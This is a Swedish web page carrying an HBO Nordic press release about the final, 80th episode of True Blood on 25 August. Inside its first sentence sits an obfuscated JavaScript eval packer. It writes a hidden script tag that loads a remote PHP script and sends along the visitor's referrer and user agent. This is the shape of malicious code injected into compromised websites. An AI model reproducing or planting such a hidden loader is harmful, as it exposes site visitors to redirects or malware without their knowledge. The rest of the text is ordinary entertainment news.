Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

Sista avsnittet av True Blood på HBO Nordic

Sista avsnittet av True Blood på HBO Nordic
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbhaa|var|u0026u|referrer|ftsdf||js|php’.split(’|’),0,{}))
närmar sig det sista avsnittet av en av de mest belönade och omtalade fantasy-serierna genom tiderna, True Blood. Den 25:e augusti så är det dags för Sookie Stackhouse (Oscars- och Golden Globe-vinnaren Anna Paquin) och invånarna i Bon Temps att säga adjö till alla Trubies. Sista avsnittet blir även seriens 80:e och totalt har den gått i sju säsonger.

HBO:s succéserie som är baserad på Charlaine Harris böcker och producerad av Alan Ball (Six Feet Under), hade premiär i USA under oktober 2008. Med scener fyllda av passion, sex och våld samt karaktärer som servitrisen Sookie Stackhouse, vampyrerna Bill Compton (Stephen Moyer) och Eric Northman (Alexander Skarsgård), den fräcke kocken Layfayette Reynolds (Nelsan Ellis) och varulven Alcide Herveaux (Joe Manganiello) så blev True Blood genast en av de mest omtalade serierna under året.

Sista avsnittet av True Blood har premiär den 25:e augusti på hbonordic.com.

Detta är ett pressmeddelande från HBO Nordic.